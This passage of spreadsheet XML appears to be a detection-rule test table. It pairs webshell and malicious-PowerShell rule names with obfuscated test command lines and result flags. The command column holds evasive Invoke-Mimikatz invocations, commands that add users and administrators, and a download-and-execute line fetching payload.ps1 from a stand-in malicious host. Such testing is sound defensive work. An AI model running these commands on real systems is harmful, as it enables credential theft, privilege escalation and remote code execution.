          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C277" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D277" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E277" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F277" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G277" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H277" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I277" s="43" t="n"/>
      <c r="J277" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K277" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="278" ht="15.75" customHeight="1" s="42">
      <c r="A278" s="43" t="n"/>
      <c r="B278" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C278" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D278" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E278" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F278" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G278" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H278" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I278" s="36" t="n"/>
      <c r="J278" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K278" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="279" ht="15.75" customHeight="1" s="42">
      <c r="A279" s="43" t="n"/>
      <c r="B279" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C279" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D279" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E279" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F279" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G279" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H279" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I279" s="36" t="n"/>
      <c r="J279" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K279" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="280" ht="15.75" customHeight="1" s="42">
      <c r="A280" s="43" t="n"/>
      <c r="B280" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C280" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D280" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E280" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F280" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G280" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H280" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I280" s="43" t="n"/>
      <c r="J280" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K280" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="281" ht="15.75" customHeight="1" s="42">
      <c r="A281" s="43" t="n"/>
      <c r="B281" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C281" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D281" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E281" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -enc SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F281" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G281" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H281" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I281" s="36" t="n"/>
      <c r="J281" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K281" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="282" ht="15.75" customHeight="1" s="42">
      <c r="A282" s="43" t="n"/>
      <c r="B282" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C282" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D282" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E282" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eNcoDedcoMmAND SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F282" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G282" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H282" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I282" s="43" t="n"/>
      <c r="J282" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K282" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="283" ht="15.75" customHeight="1" s="42">
      <c r="A283" s="43" t="n"/>
      <c r="B283" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C283" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D283" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E283" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F283" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G283" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H283" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I283" s="43" t="n"/>
      <c r="J283" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K283" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="284" ht="15.75" customHeight="1" s="42">
      <c r="A284" s="43" t="n"/>
      <c r="B284" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C284" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D284" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E284" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F284" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G284" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H284" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I284" s="43" t="n"/>
      <c r="J284" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K284" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="285" ht="15.75" customHeight="1" s="42">
      <c r="A285" s="43" t="n"/>
      <c r="B285" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C285" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D285" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E285" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F285" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G285" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H285" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I285" s="36" t="n"/>
      <c r="J285" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K285" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="286" ht="15.75" customHeight="1" s="42">
      <c r="A286" s="43" t="n"/>
      <c r="B286" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C286" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D286" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E286" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F286" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G286" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H286" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I286" s="43" t="n"/>
      <c r="J286" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K286" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="287" ht="15.75" customHeight="1" s="42">
      <c r="A287" s="43" t="n"/>
      <c r="B287" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_psloglist</t>
        </is>
      </c>
      <c r="C287" s="36" t="inlineStr">
        <is>
          <t>Suspicious Use of PsLogList</t>
        </is>
      </c>
      <c r="D287" s="36" t="inlineStr">
        <is>
          <t>aae1243f-d8af-40d8-ab20-33fc6d0c55bc</t>
        </is>
      </c>
      <c r="E287" s="36" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\cmd.exe" /c "powershell -NoProfile -WindowStyle Hidden -Command \"&amp;{Start-Process -FilePath 'C:\Windows\Sysinternals\psloglist64.exe' -ArgumentList '-x', 'application'}\""</t>
        </is>
      </c>
      <c r="F287" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G287" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H287" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I287" s="43" t="n"/>
      <c r="J287" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K287" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="288" ht="15.75" customHeight="1" s="42">
      <c r="A288" s="43" t="n"/>
      <c r="B288" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_psloglist</t>
        </is>
      </c>
      <c r="C288" s="36" t="inlineStr">
        <is>
          <t>Suspicious Use of PsLogList</t>
        </is>
      </c>
      <c r="D288" s="36" t="inlineStr">
        <is>
          <t>aae1243f-d8af-40d8-ab20-33fc6d0c55bc</t>
        </is>
      </c>
      <c r="E288" s="36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F288" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G288" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H288" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I288" s="43" t="n"/>
      <c r="J288" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K288" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="289" ht="15.75" customHeight="1" s="42">
      <c r="A289" s="43" t="n"/>
      <c r="B289" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_psloglist</t>
        </is>
      </c>
      <c r="C289" s="36" t="inlineStr">
        <is>
          <t>Suspicious Use of PsLogList</t>
        </is>
      </c>
      <c r="D289" s="36" t="inlineStr">
        <is>
          <t>aae1243f-d8af-40d8-ab20-33fc6d0c55bc</t>
        </is>
      </c>
      <c r="E289" s="36" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\cmd.exe" /"c" "powershell -nOpROfilE -WindOWStYLe Hidden -c \" &amp;{Start-Process -FilePath 'C:\Windows\Sysinternals\psloglist64.exe' /"ArgumentList" "-x'" , 'application' }\""</t>
        </is>
      </c>
      <c r="F289" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G289" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H289" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I289" s="36" t="n"/>
      <c r="J289" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K289" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="290" ht="15.75" customHeight="1" s="42">
      <c r="A290" s="43" t="n"/>
      <c r="B290" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_psloglist</t>
        </is>
      </c>
      <c r="C290" s="36" t="inlineStr">
        <is>
          <t>Suspicious Use of PsLogList</t>
        </is>
      </c>
      <c r="D290" s="36" t="inlineStr">
        <is>
          <t>aae1243f-d8af-40d8-ab20-33fc6d0c55bc</t>
        </is>
      </c>
      <c r="E290" s="36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F290" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G290" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H290" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I290" s="43" t="n"/>
      <c r="J290" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K290" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="291" ht="15.75" customHeight="1" s="42">
      <c r="A291" s="43" t="n"/>
      <c r="B291" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_psloglist</t>
        </is>
      </c>
      <c r="C291" s="36" t="inlineStr">
        <is>
          <t>Suspicious Use of PsLogList</t>
        </is>
      </c>
      <c r="D291" s="36" t="inlineStr">
        <is>
          <t>aae1243f-d8af-40d8-ab20-33fc6d0c55bc</t>
        </is>
      </c>
      <c r="E291" s="36" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\cmd.exe" /C "powershell -nop -"WindowStyle" Hidden -commAnD \" &amp;{Start-Process -FilePath 'C:\Windows\Sysinternals\psloglist64.exe' -ArguMenTlIst "-x'" , 'application' }\""</t>
        </is>
      </c>
      <c r="F291" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G291" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H291" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I291" s="36" t="n"/>
      <c r="J291" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K291" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="292" ht="15.75" customHeight="1" s="42">
      <c r="A292" s="43" t="n"/>
      <c r="B292" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C292" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D292" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E292" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "&amp;dir&amp;&amp;echo [E]"</t>
        </is>
      </c>
      <c r="F292" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G292" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H292" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I292" s="36" t="n"/>
      <c r="J292" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K292" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="293" ht="15.75" customHeight="1" s="42">
      <c r="A293" s="43" t="n"/>
      <c r="B293" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C293" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D293" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E293" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "whoami &amp; echo [E]"</t>
        </is>
      </c>
      <c r="F293" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G293" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H293" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I293" s="36" t="n"/>
      <c r="J293" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K293" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="294" ht="15.75" customHeight="1" s="42">
      <c r="A294" s="43" t="n"/>
      <c r="B294" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C294" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D294" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E294" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "&amp;wh^oami&amp;ec^ho"</t>
        </is>
      </c>
      <c r="F294" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G294" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H294" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I294" s="36" t="n"/>
      <c r="J294" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K294" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="295" ht="15.75" customHeight="1" s="42">
      <c r="A295" s="43" t="n"/>
      <c r="B295" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C295" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D295" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E295" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C "&amp;wh^oami&amp;ec^ho"</t>
        </is>
      </c>
      <c r="F295" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G295" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H295" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I295" s="43" t="n"/>
      <c r="J295" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K295" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="296" ht="15.75" customHeight="1" s="42">
      <c r="A296" s="43" t="n"/>
      <c r="B296" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C296" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D296" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E296" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "n^e^t u^s^e^r t^e^s^t^u^s^e^r P^a^s^s^w^o^r^d /a^d^d"</t>
        </is>
      </c>
      <c r="F296" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G296" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H296" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I296" s="43" t="n"/>
      <c r="J296" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K296" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="297" ht="15.75" customHeight="1" s="42">
      <c r="A297" s="43" t="n"/>
      <c r="B297" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C297" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D297" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E297" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F297" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G297" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H297" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I297" s="43" t="n"/>
      <c r="J297" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K297" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="298" ht="15.75" customHeight="1" s="42">
      <c r="A298" s="36" t="n"/>
      <c r="B298" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C298" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D298" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E298" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -NoproFILe -"Command" "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F298" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G298" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H298" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I298" s="43" t="n"/>
      <c r="J298" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K298" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="299" ht="15.75" customHeight="1" s="42">
      <c r="A299" s="43" t="n"/>
      <c r="B299" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C299" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D299" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E299" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"NoProfile" -COMmAND "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F299" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G299" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H299" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I299" s="36" t="n"/>
      <c r="J299" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K299" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="300" ht="15.75" customHeight="1" s="42">
      <c r="A300" s="43" t="n"/>
      <c r="B300" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C300" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D300" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E300" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -noProFile -"Command" "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F300" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G300" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H300" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I300" s="43" t="n"/>
      <c r="J300" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K300" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="301" ht="15.75" customHeight="1" s="42">
      <c r="A301" s="43" t="n"/>
      <c r="B301" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C301" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D301" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E301" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"NoProfile" -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F301" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G301" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H301" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I301" s="43" t="n"/>
      <c r="J301" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K301" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="302" ht="15.75" customHeight="1" s="42">
      <c r="A302" s="43" t="n"/>
      <c r="B302" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C302" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D302" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E302" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"ec" JAB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F302" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G302" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H302" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I302" s="43" t="n"/>
      <c r="J302" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K302" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="303" ht="15.75" customHeight="1" s="42">
      <c r="A303" s="43" t="n"/>
      <c r="B303" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C303" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D303" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E303" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c "wmic /node:localhost process call create 'cmd.exe /c dir C:\'"</t>
        </is>
      </c>
      <c r="F303" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G303" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H303" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I303" s="43" t="n"/>
      <c r="J303" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K303" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="304" ht="15.75" customHeight="1" s="42">
      <c r="A304" s="43" t="n"/>
      <c r="B304" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C304" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D304" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E304" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /C "wmic /node:localhost process call create 'cmd.exe /c dir C:\'"</t>
        </is>
      </c>
      <c r="F304" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G304" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H304" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I304" s="43" t="n"/>
      <c r="J304" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K304" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="305" ht="15.75" customHeight="1" s="42">
      <c r="A305" s="43" t="n"/>
      <c r="B305" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C305" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D305" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E305" s="36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305" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G305" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H305" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I305" s="43" t="n"/>
      <c r="J305" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K305" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="306" ht="15.75" customHeight="1" s="42">
      <c r="A306" s="43" t="n"/>
      <c r="B306" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C306" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D306" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E306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306" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G306" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H306" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I306" s="43" t="n"/>
      <c r="J306" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K306" s="36" t="b">
        <v>0</v>
      </c>
    </row>
